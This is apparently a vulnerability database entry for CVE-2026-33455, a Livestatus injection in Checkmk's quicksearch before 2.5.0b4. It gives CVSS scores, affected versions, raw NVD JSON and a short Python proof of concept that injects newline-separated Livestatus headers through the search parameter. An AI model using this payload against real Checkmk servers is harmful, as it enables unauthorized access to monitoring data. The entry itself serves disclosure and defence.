Security Vulnerability Report
中文
CVE-2026-33455 CVSS 6.3 MEDIUM

CVE-2026-33455

Published: 2026-04-10 09:16:23
Last Modified: 2026-04-20 17:10:27
Source: [email protected]

Description

Livestatus injection in the monitoring quicksearch in Checkmk <2.5.0b4 allows an authenticated attacker to inject livestatus commands via the search query due to insufficient input sanitization in search filter plugins.

CVSS Details

CVSS Score
6.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:checkmk:checkmk:2.5.0:b1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:checkmk:checkmk:2.5.0:b2:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:checkmk:checkmk:2.5.0:b3:*:*:*:*:*:* - VULNERABLE
Checkmk < 2.5.0b4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target configuration target_url = "http://target-checkmk-server/checkmk/api/1.0/domain-types/quicksearch/collections/all" username = "low_priv_user" password = "password" # Livestatus injection payload # The payload attempts to inject a new line and a command to list columns # exploiting the insufficient input sanitization in the quicksearch. payload = "test\nColumns: host_name description\n" params = { "q": payload # Injecting payload into the search query } try: # Sending the request with authentication response = requests.get(target_url, params=params, auth=(username, password), verify=False) if response.status_code == 200: print("[+] Potential exploitation successful!") print("[+] Response content:") print(response.text) else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33455", "sourceIdentifier": "[email protected]", "published": "2026-04-10T09:16:23.447", "lastModified": "2026-04-20T17:10:27.397", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Livestatus injection in the monitoring quicksearch in Checkmk <2.5.0b4 allows an authenticated attacker to inject livestatus commands via the search query due to insufficient input sanitization in search filter plugins."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-140"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.5.0:b1:*:*:*:*:*:*", "matchCriteriaId": "F8943BB3-1487-494C-B4EB-89EB0B18B6A2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.5.0:b2:*:*:*:*:*:*", "matchCriteriaId": "5342045D-CB9F-4663-9538-8B657C9AC833"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.5.0:b3:*:*:*:*:*:*", "matchCriteriaId": "E9566834-D4EE-4104-AD60-7988FCF17224"}]}]}], "references": [{"url": "https://checkmk.com/werk/17988", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.